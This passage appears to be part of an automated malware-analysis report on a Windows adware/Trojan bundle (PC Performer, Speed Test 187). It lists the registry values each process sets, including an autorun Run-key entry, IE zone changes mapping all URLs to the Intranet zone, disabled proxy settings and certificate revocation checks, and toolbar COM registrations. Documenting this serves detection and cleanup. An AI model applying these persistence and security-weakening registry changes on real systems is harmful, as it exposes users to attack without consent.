[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"DisplayVersion" = "11.10"
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"MajorVersion" = "11"

The process %original file name%.exe:396 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"INSTALL_URL" = "http://performersoft.com/pcperformer/welcome/index.php?cid=4751"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"RENEWALURL" = "http://performersoft.com/pcperformer/buy/pcp-buy-redirect.php?renew=1&cid=4751"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 10 02 4F 31 9B 2F 63 35 35 FF 3E DF 93 C4 68"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"UNINSTALL_URL" = "http://performersoft.com/pcperformer/afteruninstall.php?cid=4751"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"RCPURL" = "http://performersoft.com/pcperformer/buy/pcp-buy-redirect.php?cid=4751"

The Trojan modifies the IE security-zone settings so that all local web nodes whose names contain no dots and that do not refer to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process PCPerformerSetup.exe:284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 E0 EA B9 3F 86 A1 9C 43 94 0D BA BB 9E 44 19"

The process PCPerformer.exe:476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}]
"(Default)" = "Microsoft DirectInputDevice8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\PerformerSoft\PC Performer]
"StartAutoScanPMUI" = "0"

[HKCU\Software\Licenses]
"{K7C0DB872A3F777C0}" = "98 D2 7E 56 43 16 1F 05 48 6E 02 90 27 91 BF BE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1371634005"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}\InprocServer32]
"(Default)" = "%System%\dinput8.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "PCPerformer.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\PerformerSoft\PC Performer]
"FirstRun" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"Expired" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 12 8C C9 8B 70 C6 C4 75 16 B8 FC DC 03 79 0D"

[HKCU\Software\Licenses]
"{R7C0DB872A3F777C0}" = "4A 8D 7D 4C"
"{IB278E36AA51C7412}" = "01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Licenses]
"{0B278E36AA51C7412}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 78 A5 44 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To run automatically each time Windows boots, the Trojan adds the following entry, which points to its file, to the registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"RDReminder" = "%Program Files%\PC Performer\PCPerformer.exe -rem"

The Trojan deletes the following value(s) in system registry:

[HKCR\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}]
"0"

The process SpeedTest.exe:1220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 FA 88 C3 3C BC D9 1C 6E 49 D0 0A 4F A0 C8 53"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"CertificateRevocation" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"Publisher" = "Speed Analysis"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"UninstallString" = "%Program Files%\Speed Test 187\uninstall_nsis.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process regsvr32.exe:788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}]
"(Default)" = "IUI"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\AddonsFramework.DLL]
"AppID" = "{19975B78-1907-4DD6-A437-4C48120F46A4}"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}]
"(Default)" = "IExposedContent"

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{D5B70EEE-9F28-4368-A960-670C5D543131}\1.0]
"(Default)" = "AddonsFramework 1.0 Type Library"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\TypeLib\{D5B70EEE-9F28-4368-A960-670C5D543131}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}]
"(Default)" = "IBrowserEvents"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\TypeLib\{D5B70EEE-9F28-4368-A960-670C5D543131}\1.0\0\win32]
"(Default)" = "%Program Files%\Speed Test 187\AddonsFramework.Typelib.dll"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}]
"(Default)" = "IExposed"

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}]
"(Default)" = "IBackgroundEvents"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}]
"(Default)" = "IExtensionContent"

[HKCR\AppID\{19975B78-1907-4DD6-A437-4C48120F46A4}]
"(Default)" = "AddonsFramework"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}]
"(Default)" = "IButton"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 19 58 98 DE 27 0D 8F CB 4F 7F 4E E1 07 FA 43"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}]
"(Default)" = "IBrowserFrame"

[HKCR\TypeLib\{D5B70EEE-9F28-4368-A960-670C5D543131}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Speed Test 187"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}]
"(Default)" = "IContentEvents"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}]
"(Default)" = "IInternalEvents"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}]
"(Default)" = "IContextMenuItem"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}]
"(Default)" = "IBrowser"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}]
"(Default)" = "IExtension"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

The process regsvr32.exe:1272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 33 08 73 49 9D EF 4A 65 81 E1 A5 22 2B C4 64"

[HKCR\AppID\{562B9317-C08A-444A-9482-62080DD851AE}]
"(Default)" = "ButtonSite"

[HKCR\Speed Test 187.Navbar.1]
"(Default)" = "Navbar Class"

[HKCR\Speed Test 187.Navbar.1\CLSID]
"(Default)" = "{06FD8960-0295-4029-A3FA-E0027664272F}"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\ProgID]
"(Default)" = "Speed Test 187.Navbar.1"

[HKCR\Speed Test 187.Navbar\CLSID]
"(Default)" = "{06FD8960-0295-4029-A3FA-E0027664272F}"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\TypeLib]
"(Default)" = "{196FE301-0D95-4194-BFB8-3A174AAD6ED2}"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\InprocServer32]
"(Default)" = "%Program Files%\Speed Test 187\ButtonSite.dll"

[HKCR\Speed Test 187.Navbar]
"(Default)" = "Navbar Class"

[HKCR\TypeLib\{196FE301-0D95-4194-BFB8-3A174AAD6ED2}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Speed Test 187"

[HKCR\TypeLib\{196FE301-0D95-4194-BFB8-3A174AAD6ED2}\1.0\0\win32]
"(Default)" = "%Program Files%\Speed Test 187\ButtonSite.dll"

[HKCR\TypeLib\{196FE301-0D95-4194-BFB8-3A174AAD6ED2}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{196FE301-0D95-4194-BFB8-3A174AAD6ED2}\1.0]
"(Default)" = "ButtonSiteLib"

[HKCR\AppID\ButtonSite.DLL]
"AppID" = "{562B9317-C08A-444A-9482-62080DD851AE}"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}]
"(Default)" = "Navbar Class"

[HKCR\Speed Test 187.Navbar\CurVer]
"(Default)" = "Speed Test 187.Navbar.1"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\VersionIndependentProgID]
"(Default)" = "Speed Test 187.Navbar"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\TypeLib]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\VersionIndependentProgID]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\Programmable]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\ProgID]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\InprocServer32]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}]

The process regsvr32.exe:1432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Speed Test 187.ScriptHostObject\CurVer]
"(Default)" = "Speed Test 187.ScriptHostObject.1"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\InprocServer32]
"(Default)" = "%Program Files%\Speed Test 187\ScriptHost.dll"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\VersionIndependentProgID]
"(Default)" = "Speed Test 187.Tool"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\VersionIndependentProgID]
"(Default)" = "Speed Test 187.ScriptHostObject"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\TypeLib]
"(Default)" = "{30CC01EB-B247-44A6-8E32-59736942ECC0}"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{30CC01EB-B247-44A6-8E32-59736942ECC0}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Speed Test 187"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\ProgID]
"(Default)" = "Speed Test 187.Tool.1"

[HKCR\Speed Test 187.ScriptHostObject.1\CLSID]
"(Default)" = "{4A3FC207-C86D-4F11-890A-CA9F75578303}"

